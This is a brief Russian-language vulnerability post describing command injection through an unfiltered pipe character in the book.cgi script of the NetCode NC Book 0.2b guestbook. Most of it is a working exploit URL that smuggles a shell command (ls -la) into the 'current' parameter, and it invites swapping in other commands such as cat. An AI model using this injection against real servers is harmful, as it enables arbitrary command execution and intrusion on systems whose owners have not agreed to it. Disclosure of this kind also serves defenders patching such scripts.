• Партнер

  • Уязвимость в основном сценарии guestbook позволяет выполнить любые команды на сервере (нефильтруемый '|'). 

    Уязвимость работает в NetCode NC Book 0.2b.

    Эксплоит (выводит содержание корневой директории, можно добавить любые команды типа ls, cat и т.п):

    http://target/cgi-bin/ncbook/ book.cgi?action=default&current=|ls  -la/|&form_tid=996604045&prev=
    main.html&list_message_index=10

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии